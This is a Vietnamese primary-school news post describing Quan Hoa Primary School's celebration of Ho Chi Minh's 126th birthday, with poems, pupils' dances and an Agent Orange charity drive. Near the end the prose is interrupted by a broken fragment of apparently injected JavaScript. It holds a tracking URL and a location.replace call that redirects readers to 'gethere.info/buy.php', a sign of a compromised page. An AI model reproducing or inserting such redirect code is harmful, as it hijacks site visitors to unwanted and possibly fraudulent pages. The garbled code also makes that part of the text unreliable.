Lễ kỉ niệm Ngày sinh nhật Bác

17/05/2016 9:08 Sáng Phản hồi đã bị khóa

Trong những ngày tháng 5 lịch sử này, lớp lớp người dân Việt Nam luôn thành kính hướng về kỷ niệm 126 năm ngày sinh nhật Bác kính yêu –  Vị lãnh tụ vĩ đại, vị cha già kính yêu của dân tộc.

Trong suốt cuộc đời hoạt động cách mạng của Bác, dù ở trong nước hay bôn ba ở nước ngoài Người cũng luôn dành tình thương yêu cho đồng bào, đồng chí, cho bạn bè khắp năm châu. Tình thương yêu của Bác thật bao la, rộng lớn. Ca ngợi về Bác- nhà thơ Tố Hữu viết:

“ Bác ơi! Tim Bác mênh mông thế

Ôm cả non sông mọi kiếp người”.

Hồ Chí Minh, người là niềm tin, là hi vọng, là niềm kiêu hãnh của mỗi  người Việt Nam.

“Ôi lòng Bác vậy cứ thương ta

Thương cuộc đời chung, thương cỏ hoa

Chỉ biết quên mình cho hết thảy

Như dòng sông chảy nặng phù sa”.

Bác Hồ, vị cha già kính yêu của dân tộc- Người đã cống hiến, hy sinh trọn đời mình cho độc lập, tự do của Tổ quốc, cho hạnh phúc của nhân dân. Sinh thời, dù bận trăm công, ngàn việc, Bác vẫn luôn quan tâm đến thiếu niên, nhi đồng. Hình ảnh Bác Hồ kính yêu luôn là nguồn cổ vũ, động viên  trong mỗi việc làm, trong từng bài học, chắp cánh cho những ước mơ cao đẹp về tương lai, hạnh phúc, hòa bình.

Với các em, hai tiếng Bác Hồ thật thiêng liêng, tự hào và gần gũi biết bao.  Với tình cảm kính yêu, các em học sinh của trường Tiểu học Quan Hoa đã thể hiện những lời ca, điệu múa ca ngợi Chủ tịch Hồ Chí Minh vĩ đại.  Các em đã gửi gắm tình cảm, sự biết ơn chân thành  qua điệu múa “Hoa thơm dâng Bác” và ” Ai yêu Bác Hồ Chí Minh hơn thiếu niên nhi đồng”. Giai điệu thiết tha của bài hát cùng hình ảnh những cánh sen hồng đã gợi lên một niềm xúc động, nhớ thương vô vàn về Bác kính yêu, về  Làng Sen quê Bác. Để rồi ai cũng có cảm giác như Bác đang hiện diện nơi này cùng đàn cháu thân yêu.

Học tập và noi theo gương Bác Hồ vĩ đại, lớp lớp các thế hệ trẻ đang ra sức luyện rèn để xứng đáng là Chủ nhân tương lai, cháu ngoan của Bác. Để thể hiện tấm lòng tương thân tương ái, chung tay giúp đỡ cho cộng đồng, thày trò trường Tiểu học Quan Hoa đã tích cực hưởng ứng phong trào “Đền ơn đáp nghĩa”, ủng hộ cho những nạn nhân chất độc da cam. Đây là một nghĩa cử cao đẹp, giáo dục học sinh của trường biết quan tâm, chia sẻ tới những người kém may mắn.

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″;

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) {

Các phản hồi đã bị đóng lại bở quản trị.